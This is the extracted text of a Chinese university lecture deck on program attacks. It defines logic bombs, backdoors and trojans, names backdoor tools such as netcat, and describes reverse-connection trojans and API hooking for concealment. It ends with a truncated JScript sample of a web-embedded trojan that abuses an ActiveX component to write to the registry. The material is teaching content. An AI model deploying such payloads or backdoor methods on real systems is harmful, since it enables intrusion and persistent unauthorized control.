网络安全程序攻击.ppt

jsjgfzx@ 第5章 缓冲区溢出攻击回顾 缓冲区溢出攻击的基本原理、方法 缓冲区溢出程序的原理及要素 攻击UNIX 攻击WINDOWS 第6章 程序攻击 本章列出了常用的程序攻击方法，介绍了逻辑炸弹、后门、病毒及特洛伊木马等的概念和特点，并用实例说明工作原理，提供和分析了部分代码以便更深入地学习和了解技术原理。 第6章 程序攻击 6.1 逻辑炸弹攻击 6.2 植入后门 6.3 病毒攻击 6.4 特洛伊木马攻击 6.5 其它程序攻击 逻辑炸弹攻击 定义 一种隐藏于计算机系统中以某种方式触发后对计算机系统硬件、软件或数据进行恶意破坏的程序代码 触发方式 时间触发、特定操作触发、满足某一条件的触发等 第6章 第1节 逻辑炸弹攻击 特征 隐蔽性：逻辑炸弹一般都比较短小，容易附着在系统或文件上而不容易察觉，也可能被恶意隐藏在一些常用工具软件代码中 攻击性：逻辑炸弹都具有攻击性，一旦被激发，或是干扰屏幕显示，或降低电脑运行速度，或是删除程序，破坏数据 逻辑炸弹没有“传染性” 第6章 第1节 植入后门 定义 后门是计算机入侵者攻击网上其它计算机成功后为方便下次进入这台被攻击计算机而采取的一些欺骗手段和程序 目的 再次进入、不被发现 健壮性 第6章 第2节 植入后门 攻击方法 获取尽可能多的用户口令，并不会被管理员察觉或查封 更改配置 例如：rhosts 替换程序（包括源代码，函数库，内核） 要点：时间、校验和 开设新的服务，定时开启服务 第6章 第2节 植入后门 隐藏 代码：坏扇区，Boot 通讯：TCP，UDP和ICMP Shell后门：TCP/UDP/ICMP 第6章 第2节 植入后门 隐藏执行 DLL Rundll32.exe Dllcache 动态嵌入 挂接API，全局钩子（HOOK），远程线程 第6章 第2节 植入后门 Unix后门 netcat ncp bsh Vetescan 后门软件 第6章 第2节 病毒攻击 详见第13章 网络病毒防治 第6章 第3节 特洛伊木马攻击 定义 特洛伊木马，简称木马，英文名为Trojan horse 计算机领域的“特洛伊木马(Trojan)”，是指附着在应用程序中或者单独存在的一些恶意程序，它可以利用网络远程响应网络另一端的控制程序的控制命令，实现对感染木马程序的计算机的控制，或者窃取感染木马程序的计算机上的机密资料。 第6章 第4节 特洛伊木马攻击 工作原理 木马程序一般利用TCP/IP协议，采用C/S结构，分为客户端和服务器端两个部分 服务器端程序运行于被攻击的计算机上，而客户端程序在控制者的计算机上运行 客户端程序可以同时向很多服务端程序发送命令以控制这些计算机。客户端程序一般提供友好的操作界面，以便于用户的操作，其功能可能很多 第6章 第4节 特洛伊木马攻击 功能分类 远程访问型木马 密码发送型木马 键盘记录型木马 毁坏型木马 FTP型木马 第6章 第4节 特洛伊木马攻击 通讯分类 主动型木马 反弹型木马 嵌入式木马 第6章 第4节 特洛伊木马攻击 冰河 文件浏览器 屏幕监视 键盘鼠标控制 其它控制 支持配置 glacier 第6章 第4节 特洛伊木马攻击 反弹型木马 它利用防火墙对内部发起的连接请求无条件信任的特点，假冒是系统的合法网络请求与木马的客户端建立连接，从而达到对被攻击计算机控制的目的 第6章 第4节 特洛伊木马攻击 网络神偷 远程文件访问，而不是远程控制 反弹端口 HTTP 隧道 服务器端上线通知功能 通讯加密 第6章 第4节 特洛伊木马攻击 嵌入式木马 嵌入网页的共享式木马 html head title共享木马/title /head script function killErrors() {return true;} /script 第6章 第4节 script language=JScript document.write(APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent /APPLET); function mmain(){ try{ aa=document.applets[0]; aa.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0b}); aa.createInstance(); commandsh=aa.GetObject(); { commandsh.RegWrite(HKLM\\SoftWare\\Microsof